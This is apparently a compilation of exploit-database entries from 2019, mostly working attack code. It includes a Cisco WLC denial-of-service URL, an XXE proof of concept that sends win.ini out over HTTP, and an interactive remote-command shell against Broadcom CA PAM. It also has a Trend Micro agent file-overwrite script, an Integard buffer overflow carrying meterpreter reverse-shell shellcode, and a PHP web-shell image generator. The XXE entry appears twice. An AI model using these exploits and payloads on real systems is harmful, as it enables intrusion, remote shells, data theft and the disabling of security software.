# Exploit Title: Cisco WLC 2504 8.9 - Denial of Service (PoC)
# Google Dork: N/A
# Date: 2019-11-25
# Exploit Author: SecuNinja
# Vendor Homepage: cisco.com
# Software Link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20191106-wlc-dos
# Version: 8.4 to 8.9
# Tested on: not applicable, works independently of the OS
# CVE : CVE-2019-15276
# Exploit PoC:
https://WLCIPorHostname/screens/dashboard.html#/RogueApDetail/00:00:00:00:00:00">'><img src="xxxxx">
# Firing this code will cause the system to reload which results in a DoS condition.
# Exploit Title: Microsoft Visual Basic 2010 Express - XML External Entity Injection
# Exploit Author: ZwX
# Exploit Date: 2019-12-03
# Version Software : 10.0.30319.1 RTMRel
# Vendor Homepage : https://www.microsoft.com/
# Software Link: https://dotnet.developpez.com/telecharger/detail/id/593/Visual-Studio-2010-Express
# Tested on OS: Windows 7
[+] Exploit : (PoC)
===================
1) python -m SimpleHTTPServer 8000
2) Create file (.xml)
3) Create file Payload.dtd
4) Open the software Microsoft Visual Basic 2010
5) Drag the file (.xml) in a VB project
6) External Entity Injection Successful
[+] XXE.xml :
==============
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "C:\Windows\win.ini">
<!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
[+] Payload.dtd :
=================
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>">
%all;
[+] Result Exploitation :
=========================
C:\>python -m SimpleHTTPServer 8000
Serving HTTP on 0.0.0.0 port 8000 ...
ZwX-PC - - [03/Dec/2019 11:14:14] "GET /payload.dtd HTTP/1.1" 200 -
ZwX-PC - - [03/Dec/2019 11:14:14] "GET /?;%20for%2016-bit%20app%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D%0D%0A%5B
%0Aaac=MPEGVideo%0D%0Aadt=MPEGVideo%0D%0Aadts=MPEGVideo%0D%0Am2t=MPEGVideo%0D%0Am2ts=MPEGVideo%0D%0Am2v=MPEGVideo%0D%0Am4a=MPEGVideo%0D%0Am4v=MPEGVideo
Files%5D%0D%0Acolumns=193;100;60;89;100;160; HTTP/1.1" 301 -
ZwX-PC - - [03/Dec/2019 11:14:14] "GET /?;%20for%2016-bit%20app%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D%0D%0A%5B
%0Aaac=MPEGVideo%0D%0Aadt=MPEGVideo%0D%0Aadts=MPEGVideo%0D%0Am2t=MPEGVideo%0D%0Am2ts=MPEGVideo%0D%0Am2v=MPEGVideo%0D%0Am4a=MPEGVideo%0D%0Am4v=MPEGVideo
Files%5D%0D%0Acolumns=193;100;60;89;100;160;/ HTTP/1.1" 200 -
# Exploit Title: Microsoft Visual Basic 2010 Express - XML External Entity Injection
# Exploit Author: ZwX
# Exploit Date: 2019-12-03
# Version Software : 10.0.30319.1 RTMRel
# Vendor Homepage : https://www.microsoft.com/
# Software Link: https://dotnet.developpez.com/telecharger/detail/id/593/Visual-Studio-2010-Express
# Tested on OS: Windows 7
[+] Exploit : (PoC)
===================
1) python -m SimpleHTTPServer 8000
2) Create file (.xml)
3) Create file Payload.dtd
4) Open the software Microsoft Visual Basic 2010
5) Drag the file (.xml) in a VB project
6) External Entity Injection Successful
[+] XXE.xml :
==============
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "C:\Windows\win.ini">
<!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
[+] Payload.dtd :
=================
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>">
%all;
[+] Result Exploitation :
=========================
C:\>python -m SimpleHTTPServer 8000
Serving HTTP on 0.0.0.0 port 8000 ...
ZwX-PC - - [03/Dec/2019 11:14:14] "GET /payload.dtd HTTP/1.1" 200 -
ZwX-PC - - [03/Dec/2019 11:14:14] "GET /?;%20for%2016-bit%20app%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D%0D%0A%5B
%0Aaac=MPEGVideo%0D%0Aadt=MPEGVideo%0D%0Aadts=MPEGVideo%0D%0Am2t=MPEGVideo%0D%0Am2ts=MPEGVideo%0D%0Am2v=MPEGVideo%0D%0Am4a=MPEGVideo%0D%0Am4v=MPEGVideo
Files%5D%0D%0Acolumns=193;100;60;89;100;160; HTTP/1.1" 301 -
ZwX-PC - - [03/Dec/2019 11:14:14] "GET /?;%20for%2016-bit%20app%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D%0D%0A%5B
%0Aaac=MPEGVideo%0D%0Aadt=MPEGVideo%0D%0Aadts=MPEGVideo%0D%0Am2t=MPEGVideo%0D%0Am2ts=MPEGVideo%0D%0Am2v=MPEGVideo%0D%0Am4a=MPEGVideo%0D%0Am4v=MPEGVideo
Files%5D%0D%0Acolumns=193;100;60;89;100;160;/ HTTP/1.1" 200 -
#Exploit Title: NETGATE Data Backup 3.0.620 - 'NGDatBckpSrv' Unquoted Service Path
#Exploit Author : ZwX
#Exploit Date: 2019-12-04
#Vendor Homepage : http://www.netgate.sk/
#Link Software : http://www.netgate.sk/download/download.php?id=5
#Tested on OS: Windows 7
#Analyze PoC :
==============
C:\Users\ZwX>sc qc NGDatBckpSrv
[SC] QueryServiceConfig réussite(s)
SERVICE_NAME: NGDatBckpSrv
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\NETGATE\Data Backup\DataBackupSrv.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : NETGATE Data Backup Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
# Title: Broadcom CA Privileged Access Manager 2.8.2 - Remote Command Execution
# Author: Peter Lapp
# Date: 2019-12-05
# Vendor: https://techdocs.broadcom.com/us/product-content/recommended-reading/security-notices/ca20180614-01--security-notice-for-ca-privileged-access-manager.html
# CVE: CVE-2018-9021 and CVE-2018-9022
# Tested on: v2.8.2
import urllib2
import urllib
import ssl
import sys
import json
import base64
# TLS context shared by every request in send_command(): hostname checking
# and certificate verification are both switched off, so the client accepts
# whatever certificate the appliance (or anything on the path) presents.
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
def send_command(ip, cmd):
    """Run *cmd* on the appliance through the AD_IMPORT ``importID`` parameter.

    Args:
        ip: host name or address of the appliance; placed verbatim in the URL.
        cmd: shell command; URL-encoded with quote_plus before it is placed
            in the query string.

    Returns:
        The ``responseData`` field of the JSON body the appliance returns.

    Raises:
        urllib2.URLError (incl. HTTPError) on connection/HTTP failure,
        ValueError if the body is not JSON, KeyError if ``responseData``
        is missing from it.
    """
    cmd = urllib.quote_plus(cmd)
    # After server-side URL decoding importID reads `|<cmd> 2>&1||`
    # ('+' -> space, %26 -> '&'). This exact request shape -- ajax_cmd.php,
    # cmd=AD_IMPORT, a '|' inside importID -- is the thing to alert on in
    # the appliance's web-server logs.
    url = 'https://'+ip+'/ajax_cmd.php?cmd=AD_IMPORT&command=add&groupId=123&importID=|'+cmd+'+2>%261||&deviceMode=test'
    # Plain GET (data=None), no timeout, over the verification-free
    # module-level context.
    request = urllib2.Request(url, None)
    response = urllib2.urlopen(request, context=ctx)
    result = json.load(response)
    return result['responseData']
def get_db_value():
    """Read the current ``ssl_vpn_network`` value from the ``uag`` database.

    Uses the module-level global ``ip`` (assigned in main()); it is not a
    parameter. The SELECT is piped into the mysql client as root on the
    appliance and the second line of the output is returned -- presumably
    line 0 is the column header and line 1 the value row (confirm against
    the mysql client's output format).

    Returns:
        The value as a string.

    Raises:
        IndexError if the response has fewer than two lines (e.g. the
        command failed on the appliance).
    """
    cmd = "echo select value from configuration_f where name = 'ssl_vpn_network' | mysql -u root uag"
    db_value = send_command(ip,cmd)
    db_value = db_value.split('\n')[1]
    return db_value
def encode_payload(cmd):
    """Build the shell command that plants *cmd* in the configuration table.

    The UPDATE rewrites the ``ssl_vpn_network`` value to
    ``';<cmd> > /tmp/output;'`` -- the configuration value itself becomes a
    shell fragment. Which appliance component later interpolates that value
    into a command line is not visible in this script (main() pokes a local
    service on port 2210 right after planting it). The statement is
    base64-wrapped and decoded on the appliance before it reaches the mysql
    root client, presumably so its quotes never appear in the query string.

    Args:
        cmd: command whose output should land in /tmp/output on the appliance.

    Returns:
        A one-line shell command suitable for send_command().
    """
    sql_string = "update configuration_f set value='\\';"+cmd+" > /tmp/output;\\'' where name='ssl_vpn_network'"
    cmd = "echo "+base64.b64encode(sql_string)+" | base64 -d | mysql -u root uag "
    return cmd
def restore_sql(value):
    """Write *value* back into ``ssl_vpn_network`` (undoes encode_payload()).

    Same ``base64 -d | mysql -u root`` transport as encode_payload(). Only
    the database row is restored: /tmp/output, written on the appliance by
    the planted fragment, is never removed by this script and remains as a
    forensic artifact. Uses the module-level global ``ip``. Returns None.

    Args:
        value: the original configuration value captured by get_db_value().
    """
    sql_string = "update configuration_f set value='"+value+"' where name='ssl_vpn_network'"
    cmd = "echo "+base64.b64encode(sql_string)+" | base64 -d | mysql -u root uag "
    send_command(ip,cmd)
def main():
    """Interactive loop: read a command, run it on the target, print its output.

    The target comes from argv[1] and is published as the module global
    ``ip`` so get_db_value() and restore_sql() can reach it. Per iteration:
    save the current ``ssl_vpn_network`` row, replace it with the shell
    fragment from encode_payload(), send ``openvpn\\n`` to 127.0.0.1:2210 on
    the appliance (presumably the consumer of that row -- this is what makes
    the fragment run; not verifiable here), read /tmp/output, restore the
    row. Python 2 only (print statement, raw_input).
    """
    print '''Xceedium Command Execution PoC by Peter Lapp(lappsec)'''
    if len(sys.argv) != 2:
        print "Usage: xceedium_rce.py <target ip>"
        sys.exit()
    global ip
    ip = sys.argv[1]
    print 'Enter commands below. Type exit to quit'
    while True:
        cmd = raw_input('# ')
        if cmd == "exit":
            sys.exit()
        orig_value = get_db_value()
        payload = encode_payload(cmd)
        send_command(ip, payload)
        # Local poke on the appliance itself: "openvpn\n" via ncat to tcp/2210.
        send_command(ip, 'echo -e openvpn\\n | ncat --send-only 127.0.0.1 2210')
        output = send_command(ip, 'cat /tmp/output')
        print output
        # Restored on the happy path only: an exception anywhere above leaves
        # the modified configuration row in place (no try/finally).
        restore_sql(orig_value)
# Script entry point; main() does its own argv validation.
if __name__ == "__main__":
    main()
#Exploit Title: Amiti Antivirus 25.0.640 - Unquoted Service Path
#Exploit Author : ZwX
#Exploit Date: 2019-12-04
#Vendor Homepage : http://www.netgate.sk/
#Link Software : https://www.netgate.sk/download/download.php?id=11
#Tested on OS: Windows 7
#Analyze PoC :
==============
C:\Users\ZwX>sc qc ScsiAccess
[SC] QueryServiceConfig réussite(s)
SERVICE_NAME: AmitiAvHealth
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\NETGATE\Amiti Antivirus\AmitiAntivirusHealth.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Amiti Antivirus Health Check
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\ZwX>sc qc AmitiAvSrv
[SC] QueryServiceConfig réussite(s)
SERVICE_NAME: AmitiAvSrv
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\NETGATE\Amiti Antivirus\AmitiAntivirusSrv.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Amiti Antivirus Engine Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
# Exploit Title: Trend Micro Deep Security Agent 11 - Arbitrary File Overwrite
# Exploit Author : Peter Lapp
# Exploit Date: 2019-12-05
# Vendor Homepage : https://www.trendmicro.com/en_us/business.html
# Link Software : https://help.deepsecurity.trendmicro.com/software.html?regs=NABU&prodid=1716
# Tested on OS: v11.0.582 and v10.0.3186 on Windows Server 2012 R2, 2008R2, and 7 Enterprise.
# CVE: 2019-15627
# CVE-2019-15627 - Trend Micro Deep Security Agent Local File Overwrite Exploit by Peter Lapp (lappsec)
# This script uses the symboliclink-testing-tools project, written by James Forshaw ( https://github.com/googleprojectzero/symboliclink-testing-tools )
# The vulnerability allows an unprivileged local attacker to delete any file on the filesystem, or overwrite it with arbitrary data hosted elsewhere (with limitations)
# This particular script will attempt to overwrite the file dsa_control.cmd with arbitrary data hosted on an external web server, partly disabling TMDS,
# even when agent self-protection is turned on. It can also be modified/simplified to simply delete the target file, if desired.
# When TMDS examines javascript it writes snippets of it to a temporary file, which is locked and then deleted almost immediately.
# The names of the temp files are sometimes reused, which allows us to predict the filename and redirect to another file.
# While examining the JS, it generally strips off the first 4096 bytes or so, replaces those with spaces, converts the rest to lowercase and writes it to the temp file.
# So the attacker can host a "malicious" page that starts with the normal html and script tags, then fill the rest of the ~4096 bytes with garbage,
# then the payload to be written, then a few hundred trailing spaces (not sure why, but they are needed). The resulting temp file will start with 4096 spaces,
# and then the lowercase payload. Obviously this has some limitations, like not being able to write binaries, but there are plenty of config files that
# are ripe for the writing that can then point to a malicious binary.
# Usage:
# 1. First you'd need to host your malicious file somewhere. If you just want to delete the target file or overwrite it with garbage, skip this part.
# 2. Open a browser (preferably IE) and start the script
# 3. Browse to your malicious page (if just deleting the target file, browse to any page with javascript).
# 4. Keep refreshing the page until the script reports that the target file has been overwritten.
#
# It's a pretty dumb/simple script and won't work every time, so if it doesn't work just run it again. Or write a more reliable exploit.
import time
import os
import subprocess
import sys
import webbrowser
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler
class Stage1_Handler(FileSystemEventHandler):
    """Stage 1: watch the AMSP temp directory and learn which file names get reused.

    Every newly created basename is remembered. The first time a name shows
    up a second time, the stage-1 watcher is stopped and symlinkery() is
    called with every name collected so far. Relies on the module-level
    ``watcher1`` and ``symlinkery`` existing before the first event fires.
    symlinkery() does not return until its own watcher loop is interrupted,
    so this callback blocks for the rest of the run.
    """
    def __init__(self):
        # Basenames seen so far, in creation order; never contains duplicates.
        self.filenames = []

    def on_created(self, event):
        # Only the basename of event.src_path is compared.
        filename = os.path.basename(event.src_path)
        if filename in self.filenames:
            print ('Starting symlink creation.')
            watcher1.stop()
            symlinkery(self.filenames)
        else:
            self.filenames.append(filename)
            # Python 2 print statement: the '%' formats the parenthesised string.
            print ('File %s created.') % filename
class Stage2_Handler(FileSystemEventHandler):
    """Stage 2: on any event touching dsa_control.cmd, tear everything down and exit.

    The cleanup is unconditional and destructive: the two helper processes
    are killed, the junction at AMSP\\temp and C:\\test are removed, the
    original temp directory is renamed back, watcher2 is stopped and the
    interpreter is asked to exit. No step checks that the previous one
    succeeded, so a partial failure leaves the host in a mixed state.
    """
    def on_any_event(self, event):
        if os.path.basename(event.src_path) == 'dsa_control.cmd':
            print "Target file overwritten/deleted. Cleaning up."
            subprocess.Popen("taskkill /F /T /IM CreateSymlink.exe", shell=True)
            subprocess.Popen("taskkill /F /T /IM Baitandswitch.exe", shell=True)
            # By now AMSP\temp is the junction that symlinkery() created.
            os.system('rmdir /S /Q "C:\\ProgramData\\Trend Micro\\AMSP\\temp\\"')
            os.system('rmdir /S /Q "C:\\test"')
            os.rename('C:\\ProgramData\\Trend Micro\\AMSP\\temp-orig','C:\\ProgramData\\Trend Micro\\AMSP\\temp')
            watcher2.stop()
            # NOTE(review): this presumably runs on the observer's callback
            # thread, where SystemExit ends only that thread -- confirm the
            # sleep loop in Watcher.run() really terminates afterwards.
            sys.exit(0)
class Watcher(object):
    """Thin wrapper around a watchdog Observer for one handler class and one path.

    ``event_handler`` is a handler *class*, not an instance: run()
    instantiates it when scheduling.
    """
    def __init__(self, event_handler, path_to_watch):
        self.event_handler = event_handler
        self.path_to_watch = path_to_watch
        self.observer = Observer()

    def run(self):
        """Start observing and block until KeyboardInterrupt.

        The loop only sleeps; it never looks at the observer's state, so a
        stop() issued from a handler does not end this loop -- only Ctrl-C
        does. The observer is joined after the loop either way.
        """
        self.observer.schedule(self.event_handler(), self.path_to_watch)
        self.observer.start()
        try:
            while True:
                time.sleep(1)
        except KeyboardInterrupt:
            self.observer.stop()
        self.observer.join()

    def stop(self):
        """Ask the observer thread to stop; does not join it or end run()'s loop."""
        self.observer.stop()
def symlinkery(filenames):
    """Stage-2 setup: point every learned temp-file name at the bait target.

    For each name, CreateSymlink.exe (from James Forshaw's
    symboliclink-testing-tools, see header) is launched in a detached cmd
    window to link C:\\test\\virus\\<name> to C:\\test\\test\\symtarget.
    The real AMSP\\temp directory is then renamed aside and replaced with a
    junction to C:\\test, and watcher2 is started.

    Args:
        filenames: basenames collected by Stage1_Handler.

    Returns:
        Never returns normally: watcher2.run() blocks until Ctrl-C, so the
        "Watcher 2 started" line is only printed once that loop is interrupted.
    """
    print "Enter symlinkery"
    for filename in filenames:
        print "Creating symlink for %s" % filename
        # filename is interpolated, unescaped, into a shell=True command line.
        cmdname = "start cmd /c CreateSymlink.exe \"C:\\test\\virus\\%s\" \"C:\\test\\test\\symtarget\"" % filename
        subprocess.Popen(cmdname, shell=True)
    os.rename('C:\\ProgramData\\Trend Micro\\AMSP\\temp','C:\\ProgramData\\Trend Micro\\AMSP\\temp-orig')
    os.system('mklink /J "C:\\ProgramData\\Trend Micro\\AMSP\\temp" C:\\test')
    watcher2.run()
    print "Watcher 2 started"
# --- script body -----------------------------------------------------------
# Staging directory that the junction will point at. A pre-existing C:\test
# is tolerated, but the bare except also swallows every other mkdir failure.
try:
    os.mkdir('C:\\test')
except:
    pass
# path1: where the agent writes its JS temp files (per the header notes);
# stage 1 watches it for reused names.
path1 = 'C:\\ProgramData\\Trend Micro\\AMSP\\temp\\virus'
# path2: the agent install directory; stage 2 watches it for dsa_control.cmd.
path2 = 'C:\\Program Files\\Trend Micro\\Deep Security Agent\\'
watcher1 = Watcher(Stage1_Handler,path1)
watcher2 = Watcher(Stage2_Handler,path2)
# BaitAndSwitch.exe (same toolkit) is started detached for the whole session
# with symtarget, the real dsa_control.cmd and a throwaway file as arguments;
# it is killed again by Stage2_Handler.
switcheroo = "start cmd /c BaitAndSwitch.exe C:\\test\\test\\symtarget \"C:\\Program Files\\Trend Micro\\Deep Security Agent\\dsa_control.cmd\" \"C:\\windows\\temp\\deleteme.txt\" d"
subprocess.Popen(switcheroo, shell=True)
# Blocks here in stage 1; stage 2 is entered from Stage1_Handler via symlinkery().
watcher1.run()
Exploit Title: Integard Pro NoJs 2.2.0.9026 - Remote Buffer Overflow
Date: 2019-09-22
Exploit Author: purpl3f0xsecur1ty
Vendor Homepage: https://www.tucows.com/
Software Link: http://www.tucows.com/preview/519612/Integard-Home
Version: Pro 2.2.0.9026 / Home 2.0.0.9021
Tested on: Windows XP / Win7 / Win10
CVE: CVE-2019-16702
#!/usr/bin/python
########################################################
#~Integard Pro 2.2.0.9026 "NoJs" EIP overwrite exploit~#
#~~~~~~~~~~~~~~~~Authored by purpl3f0x~~~~~~~~~~~~~~~~~#
# The vulnerability: Integard fails to sanitize input #
# to the "NoJs" parameter in an HTTP POST request, #
# resulting in a stack buffer overflow that overwrites #
# the instruction pointer, leading to remote code #
# execution. #
########################################################
import socket
import os
import sys
from struct import pack
def main():
    """Interactive PoC driver: pick a target OS, build the oversized NoJs value, send one POST.

    Everything is hard-coded: host 10.0.0.130, port 18881 (also in the Host
    and Referer headers), the embedded meterpreter stub and both return
    addresses. Python 2 only (print statement; ``input()`` evaluates what is
    typed, so only a bare 1 or 2 selects a branch -- anything else falls
    through both ``if`` blocks and nothing is sent). No response is read
    from the socket in either branch.
    """
    print "~*Integard RCE Exploit for XP/7/10*~"
    print "Chose target: (Enter number only)"
    print "1) - Windows XP"
    print "2) - Windows 7/10"
    target = str(input())
    host = "10.0.0.130"
    port = 18881
    ####################################################
    # Integard's functionality interferes with reverse #
    # and bind shells. Only Meterpreter seems to work. #
    ####################################################
    # msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.128 LPORT=9001
    # -b "\x00\x26\x2f\x3d\x3f\x5c" -f python -v meterpreter EXITFUNC=thread
    # 50-byte NOP sled followed by the encoder output; a fixed string
    # literal, reproduced verbatim.
    meterpreter = "\x90" * 50
    meterpreter += "\xda\xcd\xbe\xa2\x51\xce\x97\xd9\x74\x24\xf4"
    meterpreter += "\x5f\x2b\xc9\xb1\x5b\x83\xef\xfc\x31\x77\x15"
    meterpreter += "\x03\x77\x15\x40\xa4\x32\x7f\x06\x47\xcb\x80"
    meterpreter += "\x66\xc1\x2e\xb1\xa6\xb5\x3b\xe2\x16\xbd\x6e"
    meterpreter += "\x0f\xdd\x93\x9a\x84\x93\x3b\xac\x2d\x19\x1a"
    meterpreter += "\x83\xae\x31\x5e\x82\x2c\x4b\xb3\x64\x0c\x84"
    meterpreter += "\xc6\x65\x49\xf8\x2b\x37\x02\x77\x99\xa8\x27"
    meterpreter += "\xcd\x22\x42\x7b\xc0\x22\xb7\xcc\xe3\x03\x66"
    meterpreter += "\x46\xba\x83\x88\x8b\xb7\x8d\x92\xc8\xfd\x44"
    meterpreter += "\x28\x3a\x8a\x56\xf8\x72\x73\xf4\xc5\xba\x86"
    meterpreter += "\x04\x01\x7c\x78\x73\x7b\x7e\x05\x84\xb8\xfc"
    meterpreter += "\xd1\x01\x5b\xa6\x92\xb2\x87\x56\x77\x24\x43"
    meterpreter += "\x54\x3c\x22\x0b\x79\xc3\xe7\x27\x85\x48\x06"
    meterpreter += "\xe8\x0f\x0a\x2d\x2c\x4b\xc9\x4c\x75\x31\xbc"
    meterpreter += "\x71\x65\x9a\x61\xd4\xed\x37\x76\x65\xac\x5f"
    meterpreter += "\xbb\x44\x4f\xa0\xd3\xdf\x3c\x92\x7c\x74\xab"
    meterpreter += "\x9e\xf5\x52\x2c\x96\x11\x65\xe2\x10\x71\x9b"
    meterpreter += "\x03\x61\x58\x58\x57\x31\xf2\x49\xd8\xda\x02"
    meterpreter += "\x75\x0d\x76\x08\xe1\xa4\x87\x0c\x71\xd0\x85"
    meterpreter += "\x0c\x52\x08\x03\xea\xc4\x1a\x43\xa2\xa4\xca"
    meterpreter += "\x23\x12\x4d\x01\xac\x4d\x6d\x2a\x66\xe6\x04"
    meterpreter += "\xc5\xdf\x5f\xb1\x7c\x7a\x2b\x20\x80\x50\x56"
    meterpreter += "\x62\x0a\x51\xa7\x2d\xfb\x10\xbb\x5a\x9c\xda"
    meterpreter += "\x43\x9b\x09\xdb\x29\x9f\x9b\x8c\xc5\x9d\xfa"
    meterpreter += "\xfb\x4a\x5d\x29\x78\x8c\xa1\xac\x49\xe7\x94"
    meterpreter += "\x3a\xf6\x9f\xd8\xaa\xf6\x5f\x8f\xa0\xf6\x37"
    meterpreter += "\x77\x91\xa4\x22\x78\x0c\xd9\xff\xed\xaf\x88"
    meterpreter += "\xac\xa6\xc7\x36\x8b\x81\x47\xc8\xfe\x91\x80"
    meterpreter += "\x36\x7d\xbe\x28\x5f\x7d\xfe\xc8\x9f\x17\xfe"
    meterpreter += "\x98\xf7\xec\xd1\x17\x38\x0d\xf8\x7f\x50\x84"
    meterpreter += "\x6d\xcd\xc1\x99\xa7\x93\x5f\x9a\x44\x08\x6f"
    meterpreter += "\xe1\x25\xaf\x90\x16\x2c\xd4\x90\x17\x50\xea"
    meterpreter += "\xad\xce\x69\x98\xf0\xd3\xcd\x83\xee\xf9\x3b"
    meterpreter += "\x2c\xb7\x68\x86\x31\x48\x47\xc5\x4f\xcb\x6d"
    meterpreter += "\xb6\xab\xd3\x04\xb3\xf0\x53\xf5\xc9\x69\x36"
    meterpreter += "\xf9\x7e\x89\x13"
    if target == "1":
        print "[*] Sending Windows XP payload using meterpreter/reverse_tcp"
        # JMP ESP at 0x3E087557 in iertutil.dll
        # EIP-overwrite layout: 512 bytes of 'A', the address, the stub,
        # then 'C' padding up to exactly 1500 bytes.
        crash = "A" * 512
        crash += pack("<L",0x3E087557)
        crash += meterpreter
        crash += "C" * (1500 - len(crash))
        buffer = ""
        buffer += "POST /LoginAdmin HTTP/1.1\r\n"
        buffer += "Host: 10.0.0.130:18881\r\n"
        buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0\r\n"
        buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
        buffer += "Accept-Language: en-US,en;q=0.5\r\n"
        buffer += "Accept-Encoding: gzip, deflate\r\n"
        buffer += "Referer: http://10.0.0.130:18881/\r\n"
        buffer += "Connection: close\r\n"
        buffer += "Upgrade-Insecure-Requests: 1\r\n"
        buffer += "Content-Type: application/x-www-form-urlencoded\r\n"
        # Declared Content-Length (78) is far smaller than the actual body
        # (NoJs alone is 1500 bytes) -- that mismatch on POST /LoginAdmin is
        # a detection signature in its own right.
        buffer += "Content-Length: 78\r\n\r\n"
        buffer += "Password=asdf&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=" + crash + "&LoginButtonName=Login\r\n"
        # One send() on a fresh TCP connection, then close; nothing is read back.
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host,port))
        s.send(buffer)
        s.close()
        print "[*] Done"
    if target == "2":
        print "[*] Sending Windows 7/10 payload using meterpreter/reverse_tcp"
        # ASLR IS ON!!! MUST USE NON-ASLR MODULE!
        # POP POP RET in integard.exe (ASLR disabled)
        nSEH = "\xEB\xD0\x90\x90" # Jump 48 bytes backwards
        SEH = pack("<L",0x004042B0)
        jumpCall = "\xEB\x09" # Jump 11 bytes forward to hit the CALL in bigBackJump
        bigBackJump = "\x59\xFE\xCD\xFE\xCD\xFE\xCD\xFF\xE1\xE8\xF2\xFF\xFF\xFF"
        # SEH-overwrite layout, 2776 bytes before nSEH: NOP filler sized so
        # that stub + 50 NOPs + jumpCall + bigBackJump end exactly at the
        # handler record, then nSEH and the SEH handler address.
        crash = "\x90" * (2776 -len(jumpCall) - len(bigBackJump) - len(meterpreter) - 50)
        crash += meterpreter
        crash += "\x90" * 50
        crash += jumpCall
        crash += bigBackJump
        crash += nSEH
        crash += SEH
        buffer = ""
        buffer += "POST /LoginAdmin HTTP/1.1\r\n"
        buffer += "Host: 10.0.0.130:18881\r\n"
        buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0\r\n"
        buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
        buffer += "Accept-Language: en-US,en;q=0.5\r\n"
        buffer += "Accept-Encoding: gzip, deflate\r\n"
        buffer += "Referer: http://10.0.0.130:18881/\r\n"
        buffer += "Connection: close\r\n"
        buffer += "Upgrade-Insecure-Requests: 1\r\n"
        buffer += "Content-Type: application/x-www-form-urlencoded\r\n"
        # Same undersized Content-Length as the XP branch; the body is
        # thousands of bytes long.
        buffer += "Content-Length: 78\r\n\r\n"
        buffer += "Password=asdf&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=" + crash + "&LoginButtonName=Login\r\n"
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host,port))
        s.send(buffer)
        s.close()
        print "[*] Done"
# Runs unconditionally -- no __main__ guard, so importing the module also prompts.
main()
# Exploit Title: Verot 2.0.3 - Remote Code Execution
# Date: 2019-12-05
# Exploit Author: Jinny Ramsmark
# Vendor Homepage: https://www.verot.net/php_class_upload.htm
# Software Link: https://github.com/verot/class.upload.php
# Version: <=2.0.3
# Tested on: Ubuntu 19.10, PHP 7.3, Apache/2.4.41
# CVE : CVE-2019-19576
<?php
#Title: jpeg payload generator for file upload RCE
#Author: Jinny Ramsmark
#Github: https://github.com/jra89/CVE-2019-19576
#Other: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19576
#Usage: php inject.php
#Output: image.jpg.phar is the file to be used for upload and exploitation
#This script assumes no special transforming is done on the image for this specific CVE.
#It can be modified however for different sizes and so on (x,y vars).
// Show parse errors only: the GD and string-offset notices that
// tryInject() can raise are hidden by this error_reporting level.
ini_set('display_errors', 1);
error_reporting(E_PARSE);
#requires php, php-gd
// Inputs: the cover JPEG (fetched below), the PHP fragment to embed, and the
// JPEG quality used for every re-encode. $quality is a string here; the
// imagejpeg() calls accept it as-is.
$orig = 'image.jpg';
$code = '<?=exec($_GET["c"])?>';
$quality = "85";
$base_url = "http://lorempixel.com";
echo "-=Imagejpeg injector 1.7=-\n";
// Fetch a fresh 100x100 placeholder image and retry until tryInject()
// succeeds. There is no attempt limit, so an unreachable $base_url (or a
// run of images that never work) keeps this loop going indefinitely.
do
{
    $x = 100;
    $y = 100;
    $url = $base_url . "/$x/$y/";
    echo "[+] Fetching image ($x X $y) from $url\n";
    file_put_contents($orig, file_get_contents($url));
} while(!tryInject($orig, $code, $quality));
echo "[+] It seems like it worked!\n";
echo "[+] Result file: image.jpg.phar\n";
/**
 * Try to embed $code in the JPEG $orig at a position that survives a GD re-encode.
 *
 * The image is first normalised through imagejpeg() at $quality. The code is
 * then written over successive byte positions of the scan data, walking
 * backwards from the last byte down to just past the SOS marker located by
 * findStart(). Each candidate is re-encoded with GD and searched for the
 * literal $code; the first survivor is written out as image.jpg.phar.
 *
 * @param string $orig     path of the source JPEG; deleted when every position fails
 * @param string $code     bytes to embed
 * @param string $quality  JPEG quality handed to imagejpeg()
 * @return bool true when image.jpg.phar contains the code after re-encoding,
 *              false when all positions were tried
 */
